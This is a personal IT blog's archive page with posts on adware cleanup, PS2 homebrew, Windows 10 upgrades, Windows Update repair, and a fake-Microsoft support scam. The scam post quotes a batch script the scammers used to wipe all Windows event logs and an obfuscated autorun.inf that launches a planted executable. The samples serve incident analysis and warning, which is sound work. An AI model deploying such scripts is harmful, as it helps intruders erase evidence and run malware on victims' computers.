Wednesday, December 30, 2015

Addonjet and a.karmakitty.info

What a crap...
Another case on malware cleaning shows how to get rid of the annoying karmakitty pop-ups in Google Chrome and unwished ads by Addonjet.

The computer is infected with malware and the web browser can't be used properly anymore. In every step you take another pop-up appears wanting you to call a phone number. In my case the problems only occured on Google Chrome.


Possible browser extensions which were also responsible for this couldn't be removed anymore. The settings menu closed when you attempted to open the extension list. Cleaning up the cache didn't help to solve this.

And there was no unwanted software installed so the fastest and most-effective way was to run a complete malware check. I recommend Malwarebytes Anti-Malware, which found a lot of infections.
After the clean-up and restart the whole issue was solved. Make sure your antivirus software is working properly or may get a better one.

Tuesday, December 29, 2015

TheSuperAdmins #001: It's not just about the key

'TheSuperAdmins' is a new IT comic parody showing the everyday life in an IT department in a funny way.

The first story is about a complaint and a special wish from the boss...


See in big: #1: It's not just about the key.






























Tuesday, December 22, 2015

How to use homebrew software on PS2 - An overview

By the end and after the PS2 era more and more homebrew software was released for the famous console of the early 2000s. After the first step was done, you were able to execute multiple applications.

First, you had to find a way to install 'FreeMCBoot' (in short FMCB) on your Memory Card. I only know two ways to do that: Let someone who already has it install FMCB on your Memory Card or: Buy a network adapter to install a hard disk in the PS2 (of course only possible with the older, bigger model), install an ISO image with homebrew software on your hard drive and boot it with a special CD.


Installing FMCB

I would recommend to use the Windows tool WinHIIP for that: Connect the IDE hard drive either with an USB adapter or with an IDE cable with your PC. Start the tool and select the ISO you want to install (it's usually used for games). Before using it the hard drive must be formatted in PFS which is possible with WinHIIP.

Following that the hard disk has to get back in the PS2 again. The previously called 'special CD' is something like 'HD Advance' or any other software which was sold with the network adapter to use the hard disk.

So after booting the CD you'll end up in the menu with all on the hard disk installed PS2 games - including the ISO with homebrew software. This image should include the software 'ULaunchELF', a software - as the name says - able to execute ELF files.

ULaunchELF is a kind of file explorer for the PlayStation 2. You can even plug in an USB flash drive (in FAT32 of course) and use it for saving and executing files. ELF files - which means "executable and linkable format" - can now be used from this point. You only need some of them.

But now you should use the opportunity to install "FMCB" by launching the installation files from either an USB drive or from the hard drive. Make sure that you have some space on your Memory Card. It takes something around 2 MB which is crucial because the Memory Cards usually had 8 MB space.

From that point your boot menu is extended and you can add more software in the list by using the configurator.

Which opportunities do you get?

You can use the 'Simple Media System' - short 'SMS Player' to use your PS2 as a media center with files even on your external HDD. Unfortunately because there was no further development you can't play all media files. Especially the mp4 format does not work, while at least most of the avi files run.

Some minigames are available like rebuilds of Space Invaders, Tetris or even Super Mario - to be started as a single ELF.

Keyword emulators: There's a selection of ways to play games from older consoles like NES, SNES, GB, C64 and much more. In the last years there was even a PlayStation 1 emulator for its successor. Unfortunately a bit slow, but you can't expect miracles by starting such big games from the flash drive...

The ESR shows an alternate way to play copied games from the disk without having a special chip. A game with a special ESR patch can be started from the FMCB menu.

There are also alternate ways to start games from your hard drive: With the OpenPS2Loader you can not only launch games from your HDD - you can also create Virtual Memory Cards (VMC) to have your savegames on your HDD in a special folder. And there's more: You can use your FAT32 external hard drive or a public folder in your network to store your games instead of an internal hard drive. And despite we have already 2015 - there's still development!

Summary

Even in this short overview you can see the amount of opportunities you have once the PS2 has the ability to launch ELF files. It just shows extended features beyond the basic firmware. 

Of course the successor PS3 has way more to offer in the homebrew area, but in the PS2 era the firmware didn't change like every week - just with the release of newer models - which makes the homebrew usage a lot easier.

Friday, December 11, 2015

Forcing the upgrade to Windows 10

Since its start of distribution last summer Windows 10 has been deployed on a lot of former Windows 7 oder 8 computers. At the beginning you could wait for a while to get your upgrade - by now it usually doesn't take too long for an invitation to upgrade. And if not, you can force it with a tool...

In the case of a newly-installed Windows 7 with missing updates you usually have to wait for a while to get the direct opportunity to upgrade to the latest Microsoft operating system.


The folder on drive C:\
Following this link you'll find a Microsoft tool (GetWindows10-Web_Default_Attr.exe) with which you can start the upgrade. It goes through a few steps: Of course first the download itself. While the process on the C:\ drive three new folders are created (as seen on the right).

It's important to keep this download running - what also means having a proper internet connection. Once this download is aborted for some reason you can't continue it with this tool.  
You get the message, that you need another restart to make this tool work again, which will appear every time you try. You need to delete these new folders on the C:\ which is in the easiest way only possible by starting your computer with a Live OS on a CD/DVD. 
Else, the biggest file within this folders can't be deleted because it's in use. Maybe Safe Mode is another way, you just have to get rid of these folders. Once that's done, you can continue by starting the tool again.



After the download follow some checking routines and you have to accept the license agreement before a search for updates starts.

Following that the usual Windows 10 installation procedure continues.

And that's it.

Tuesday, December 8, 2015

A call from Microsoft 'to fix the issue'

Sometimes you hear stories about scammer pretending to work for Microsoft which are trying to get access to a private computer. Their victims are gullible people which called directly at home. Lately I got to see a Windows 7 system where such a 'helpdesk guy' had access...

It all starts with a phone call where these guys say they're from Microsoft and on the computer is an issue to be fixed. 

Interestingly, they're are even calling people in Germany only speaking English and just a bit of German.

In case there were comprehension problem they used internet translation tools to move forward and they always said when this procedure costs something, they will say it (as seen later...).

Getting access

To show the people that they're trustworthy they mention a combination of numbers and later show them the exact same digits somewhere on the computer. I don't know which numbers, but obviously a combination which is on all Windows machines the same.

For getting the access they're letting their victims go to https://showmypc.com to download a remote support tool. This tool apparently includes a service and a version of Tight VNC.

Additionally they are using the tool "LogMeIn Rescue" (https://secure.logmein.com) for file transfer. Then they're copying a txt file to the desktop with following three lines to 'prove' they're real:
My Name = Christopher winter
My Employee ID = MS98646
Our Email Address = support@microsoft.com

The 'cleaning'

During this remote session the tool ATF cleaner was copied to the computer. According to the website (www.atribune.org) this software is from 2006 - so for Windows 2000 and Windows XP. There are extra notes added for the support of Windows Vista. 

The tool is just able to delete cache from Firefox and Opera. Concerning its age the only reason for using this exe must be to distract from something. Maybe from the batch file which was copied and executed shortly afterwards - name: CLEANER.bat.

Correct me, if I'm wrong, but its purpose is to get admin access and delete the event logs.
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

By that time the fake support guy said that he wants to install a special cleaning software for something around 90 euros. He couldn't send an email or other information material. It was about just installing it now or not. After that the user of the computer ended the call.

The CLEANER.bat wasn't deleted properly, because I found it in the Recycle Bin. But the eventlog was starting from new...

Further traces

In 'Run' (Windows+R) I found the following commands which were last used: 

iexplorer support.me (leads to https://secure.logmeinrescue.com/Customer/Code.aspx)
services.msc
eventvwr
certmgr.msc
prefetch
winver
msconfig

Looking for further hints for what has been done, I saw two suspicious files where the changing time was exactly during the end of the time when the support had access. In the root folder of the second hard drive is a pwdx.exe and an autorun.inf which should open the exe-file (see below).

;wnylejSrKiV rQxf eiYqRlldTudXghdrnqmBjyIgAeaGLphfkBfnuegSkajgEnux
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1

About the pwdx.exe I'm not sure what that exactly is. I only found the information that it's a maybe a Linux-based monitoring tool. Please comment, if you know more.

Anyway, the computer was filled with these virus warning windows as seen on the right. And there was also a warning message from the internet service provider the next day.

During the time the session was running, anything could have been done. These are just the few things I've found in a short amount of time.

After this event the computer wasn't connected to the internet anymore. A reinstallation was more than necessary...

Note: If anybody knows more about these fake helpdesk people or has his oder her experiences about it, feel free to comment. 

Sunday, December 6, 2015

Windows Updates not working after malware cleanup

A Windows 7 computer was infected with some viruses, malware etc. and after a successful cleaning procedure there remained one visible problem: Windows Update is not working anymore.

While trying to search for further updates the following message appeared:

Windows Update cannot currently check for updates because the service is not running.

But the service is definitely running. To fix this the following steps need to be done:

1. Open services.msc (or go to computer management) to stop the Windows Update service.

2. Go to C:\Windows and rename the folder "SoftwareDistribution" to something like "SoftwareDistribution_old".

3. Restart the Windows Update service and restart the computer. The folder will be recreated.

4. Go to Windows Update again and search for updates. This time you're offered to install "New Windows Update software". Confirm it.

5. Following that the search for updates seems endless only to end up with error messages like these two: 0x80072EE2 or 0x8007000E. It won't continue.

And there they are...
6. So now go to Internet Explorer to the options and reset the settings and cache completely. Restart your computer and all of a sudden the updates will appear.

Anyway: After such virus problems there can be several other things damaged in the operating system. The safest and most recommended way would be to save the data and reinstall the OS. This is just a quick fix to get Windows Update working again.